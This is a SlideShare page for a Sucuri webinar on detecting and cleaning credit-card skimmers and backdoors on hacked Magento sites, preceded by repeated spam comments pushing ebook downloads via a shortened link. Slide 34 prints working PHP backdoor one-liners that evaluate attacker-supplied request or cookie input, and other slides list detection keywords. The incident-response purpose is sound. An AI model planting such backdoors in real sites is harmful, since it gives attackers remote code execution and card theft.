Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Sucuri Webinar: How to Clean a Hacked Magento Website

1,112 views

Published on

TIP: Make sure you scroll to the last slide to view the video recording.

On Feb 22, 2017, Sucuri Incident Responder, Cesar Anjos, presented this webinar as a step by step guide on how to clean a hacked Magento website.

If your Magento website has been hacked, learn how to appropriately deal with the security incident, fix the hack, and secure your ecommerce website against future breaches.

This webinar will take place on Wednesday, Feb 22nd at 11am PST. Following his presentation, Cesar will take questions from participants. Please complete the form to register.

In this webinar you will learn how to:

- Understand if there has been a compromise - Beginner
- Determine the presence of credit card stealers
- Intermediate/Advanced
- Look for the most common credit card stealers - Intermediate
- Handle potential data breaches - Intermediate
- Remove most Magento infections - Beginner

Published in: Internet
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • DOWNLOAD THAT BOOKS INTO AVAILABLE FORMAT (2019 Update) ......................................................................................................................... ......................................................................................................................... Download Full PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download Full doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download PDF EBOOK here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download EPUB Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... Download doc Ebook here { http://bit.ly/2m6jJ5M } ......................................................................................................................... ......................................................................................................................... ................................................................................................................................... eBook is an electronic version of a traditional print book that can be read by using a personal computer or by using an eBook reader. (An eBook reader can be a software application for use on a computer such as Microsoft's free Reader application, or a book-sized computer that is used solely as a reading device such as Nuvomedia's Rocket eBook.) Users can purchase an eBook on diskette or CD, but the most popular method of getting an eBook is to purchase a downloadable file of the eBook (or other reading material) from a Web site (such as Barnes and Noble) to be read from the user's computer or reading device. Generally, an eBook can be downloaded in five minutes or less ......................................................................................................................... .............. Browse by Genre Available eBooks .............................................................................................................................. Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, ......................................................................................................................... ......................................................................................................................... .....BEST SELLER FOR EBOOK RECOMMEND............................................................. ......................................................................................................................... Blowout: Corrupted Democracy, Rogue State Russia, and the Richest, Most Destructive Industry on Earth,-- The Ride of a Lifetime: Lessons Learned from 15 Years as CEO of the Walt Disney Company,-- Call Sign Chaos: Learning to Lead,-- StrengthsFinder 2.0,-- Stillness Is the Key,-- She Said: Breaking the Sexual Harassment Story That Helped Ignite a Movement,-- Atomic Habits: An Easy & Proven Way to Build Good Habits & Break Bad Ones,-- Everything Is Figureoutable,-- What It Takes: Lessons in the Pursuit of Excellence,-- Rich Dad Poor Dad: What the Rich Teach Their Kids About Money That the Poor and Middle Class Do Not!,-- The Total Money Makeover: Classic Edition: A Proven Plan for Financial Fitness,-- Shut Up and Listen!: Hard Business Truths that Will Help You Succeed, ......................................................................................................................... .........................................................................................................................
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • These are some nice tips. Apart from these, users can also try to compare and clean modifications in files and folders as mentioned here: https://www.cloudways.com/blog/recover-hacked-magento-store/
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Sucuri Webinar: How to Clean a Hacked Magento Website

  1. 1. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri
  2. 2. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri
  3. 3. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri VALENTIN VESA Brand Evangelist - Moderator @adspedia
  4. 4. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri HOUSEKEEPING ITEMS ● We want to hear from you ● Question tab in GoToWebinar ● Tweet @SucuriSecurity using #AskSucuri ● Questions will be answered at the end ● All questions will receive a response ● Video and slides coming in a few days ● Please share this content with other website owners
  5. 5. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri CESAR ANJOS Security Analyst / Incident Responder at Sucuri
  6. 6. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Porto, Portugal
  7. 7. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri What to expect from this webinar ● Understanding if there may have been some compromise ● How to assess if there may be any credit card stealers on the site ● How to look for the most common types of credit card stealers ● How to get rid of most infections without actually having much technical knowledge
  8. 8. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri sucuri.net/guides Step-by-step walkthroughs for popular CMS platforms and website security issues. Get Instructions
  9. 9. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Data stealer malware ● Biggest enemy of Magento installations. ● Confirmation of a breach may require cooperation with authorities. ● Advisable to alert customers as they may have not (yet) been affected by it.
  10. 10. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Overview ● Looking for signs of compromise ● Finding the malware ● Clean the infection and wipe its remains ● What Now?
  11. 11. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Understanding Data breach implications If any compromise happens, be sure to make a full backup of: •Server log files •All files pertaining the site •Database Having a data breach on your website affects the website, its owner, and its users. The website owner has the responsibility to investigate any suspicion of compromise and keep record of all findings. Any data stolen by the attackers is usually used within the first 12hrs (post-theft). In some cases, it may also be kept for later use, or sold.
  12. 12. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri LOOKING FOR SIGNS OF COMPROMISE What are some of the indicators that your website has been compromised?
  13. 13. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Indicators of compromise: ● Customers reporting strange behavior on your site ● Checkout process acting oddly ● Customers complaining that their data was stolen after buying on your website ● External scanners detecting some malware or blacklist ● Unauthorized acesses or changes ● You just spot something strange, such as a defacement
  14. 14. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Dialog with customers ● Data being stolen ● Redirects ● Pop-ups ● Alert messages ● When exactly did the visit and theft occur ● What browser/Antivirus/OS/platform ● Were any purchases done on other websites ● Detailed explanation of what happened What they report What you need to verify
  15. 15. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Abnormal checkout behavior ● Redirects ● Pop-ups ● Strange files being loaded on the page ● Payments going to someone else’s account ● Just doesn’t work Ensuring that the entire flow keeps its integrity is very important.
  16. 16. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri
  17. 17. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Using a Virtual Credit Card ● Virtual Credit cards have spending limit and usually very short expiration date ● Most banks across the world offer such service ● Low risk if stolen ● Can use pre-paid or debit system ● No direct relation between the card and your Identity ● May have a per card cost, usually 1$.
  18. 18. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Scan your site ● Sucuri Sitecheck - sitecheck.sucuri.net ● Hypernode’s Magereport - magereport.com ● Magescan - magescan.com ● Google’s Virustotal - virustotal.com
  19. 19. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Sitecheck ● Checks for blacklists ● Scans for multiple kinds of malware within the site ● Provides immediate insight on what was detected
  20. 20. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Magereport ● Checks for missing patches or vulnerable elements ● Check for certain specific malware types that affect Magento environments
  21. 21. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Virustotal Checks for blacklists on multiple providers
  22. 22. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Blacklist Google’s blacklist is the most damaging blacklist. Blacklisted websites lose about 95% of traffic
  23. 23. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Modus Operandi of credit card swipers ● Typically Javascript ● Can work based on current page e.g. “firecheckout” ● Can be present on PHP files that directly handle checkouts ● Gets cached easily by Magento ● Typically stored inside /media ● Usually disguises itself as an image or a file with no extension ● File size grows over 3Mb’s extremely fast ● Can only be inside PHP files Sends the data to an external domain Stores the Data on your domain’s files
  24. 24. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri FINDING THE MALWARE How can the malware be located?
  25. 25. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Focused analysis ● Needle in a haystack ● Start by focusing on what you already know ● Attempting to establish a timeframe is important in data theft cases ● Look for what else may be present
  26. 26. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Check modified files ● Using Diff command to compare with a clean version ● Checking for files modified within the last few days if you suspect the compromise was recent ● Try Amasty’s Free Modified Core files reporting tool https://blog.amasty.com/freebie-magento-modified-core-files-report-by-amasty
  27. 27. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Diff command ● $ mkdir magento-2.1.3 ● $ cd magento-2.1.3 ● $ wget github.com/magento/magento2/archive/2.1.3.tar.gz ● $ tar -zxvf 2.1.3.tar.gz ● $ diff -r 2.1.3 ./public_html ● Has to be run through SSH. ● Useful to get a direct comparison of what is different between 2 sets of folders. ● If comparison is done with a freshly downloaded installation any modules that have been installed by the owner have to be compared separately. ● Can also be used to compare current live version with a backup to get a direct result of what is different.
  28. 28. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Files modified recently ● $ find ./ -type f -mtime -15 Tells what files were modified in the last 15 days ● $ find ./ -type f -mtime -30 Tells what files were modified in the last 30 days ● This gives a clear indication of what files have been modified in the timeframe specified. ● If you have a clear date of when the compromise might have happened, this is a great starting point.
  29. 29. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Pro Tip - Check your modified files ● Look for files bigger than 3Mb’s as they may store customers stolen data $find . -type f -size +3M ● Use Sucuri’s Backup service as an Integrity Records keeper
  30. 30. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Audit users list ● Any unfamiliar users must be removed
  31. 31. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Functions/code most used by malware that steals credit card info/logins Search for common swiper functions/code ● <script (with inclusion of an external file) ● http.open ● http.send ● this[“eval”] ● fwrite ● file_put_contents ● FILE_APPEND ● mail( ● Curl
  32. 32. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Example swipers on app/code/core/Mage/Checkout/controllers/OnepageController.php
  33. 33. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Search for common backdoor functions/code ● assert ● stripslashes ● preg_replace (with /e/) ● move_uploaded_file ● strrev ● file_get_contents ● encodeURI ● strtr ● base64 ● str_rot13 ● gzuncompress ● gzinflate ● curl_exec ● exec ● create_function ● wget ● system
  34. 34. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Common backdoors <?php if/*pzC*/(isset($_REQUEST['gTOM']))/*A*/{/*h*/$1=/*B*/"assert";$G=$1/*HJ*/(/*jyM*/$_REQUEST['gTOM'])/*tC*/;exit;}?> <?php /*k*/if(!function_exists('_BmHCiKnI')){$GLOBALS['_CbuEzptH_']=Array('' .'preg_repla' .'ce'); @function _BmHCiKnI($i){$a=Array('jQzN','/(.*)/e','jQzN','');return $a[$i];}if(@isset($_REQUEST[_BmHCiKnI(0)])){ @$GLOBALS['_CbuEzptH_'][0](_BmHCiKnI(1),$_REQUEST[_BmHCiKnI(2)],_BmHCiKnI(3));exit;}} <?php if(isset($_COOKIE["lI"])){$_COOKIE["ud"]($_COOKIE["lI"]);exit;} <?php function echo2($token){ @eval($token);}echo2($_POST[libsodium]);?> if(md5($_COOKIE['key']) == $key) { eval (base64_decode($_POST["code"])); } ${"QK"}=@$ {"_POST"/*cdtxd6*/};@((($QK{ "0"}/*vgx94*/<>@$QK{"1"})))?@ $QK{"2" }(( (/*nkp*/@${"QK"}{"3"}))):${'QK'
  35. 35. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Check your site’s header and footer areas Footer and header areas are a prime target for attackers because they load throughout the site
  36. 36. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri
  37. 37. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri
  38. 38. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Check with an outside expert Consult directly with security experts when in doubt, or just require assistance.
  39. 39. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri CLEAN THE INFECTION AND WIPE ITS REMAINS How to effectively get rid of Magento’s most common infections
  40. 40. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Before you attempt to fix anything ● Ensure that you have performed a full backup of files and database ● Store them in a safe location ● Preferably import your website on a temporary environment ● Place your website in maintenance mode, if required ● Contact authorities if you are a big store and there was any data theft
  41. 41. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Fix hacked files ● Search the files for any malware indication you may have obtained ● Inspect the modified files that were discovered by the investigation ● Restore those files to a known integral legitimate state from official sources ● Googling parts of suspicious code may help with cleanup ● Remove any suspicious code ● Test the site to ensure everything still works as it should
  42. 42. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Suspicious code ● Sometimes code may look suspicious because it is encoded, but many modules have the code encoded to prevent being stolen. ● The modules must be individually compared with their original version. ● Some online tools that help decode remaining code. ● ddecode.com/phpdecoder ● unphp.net/ ● jsbeautifier.org/
  43. 43. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Using ddecode.com
  44. 44. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Using unphp.com
  45. 45. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Database infections ● Ensure that you have a full backup before any operation. ● They can usually be cleaned directly through the backend of the site ● Attackers usually infect the core_config_data table, more specifically, the records design/head/includes and design/footer/absolute_footer
  46. 46. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Tidying up ● Reset user passwords ● Change cPanel or FTP/SFTP credentials ● Review who has access to what ● Clear caches (very important step) ● Fix any malware warnings or blacklists
  47. 47. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri All CLEAN, WHAT NOW?
  48. 48. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Steps to take ● Ensure all security patches are applied ● Have a backup system in place ● Scan computers that access the backend ● Add extra control/protection mechanisms to the site ● Take every precaution to ensure that all vulnerable areas are secure or patched, such as /downloader ● Change backend admin area URL ● Make regular purchases on your own site to ensure its integrity (using virtual Credit Cards)
  49. 49. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Useful extensions/services to have in place ● Sucuri Firewall ● MageFirewall Security ● Nexcess Sentry Two-Factor Authentication ● miniOrange Two-Factor Authentication ● Admin Actions Log extension (if there are various admin users)
  50. 50. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri You have to assume the attackers will be back ● Keep all accesses filtered and monitored ● Keep up with security updates ● Prepare an incident response plan with your team - https://github.com/talesh/response ● Ensure that the backup system works when needed; test by restoring it on a separate location and verify that it works
  51. 51. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Website Firewall
  52. 52. How to CLEAN a Hacked Magento SiteWEBINAR Cesar Anjos | @sucurisecurity #AskSucuri WEBINAR Cesar Anjos | @sucurisecurity #AskSucuri Tweet us any time with your questions @SucuriSecurity using #AskSucuri THANK YOU Time for Questions

×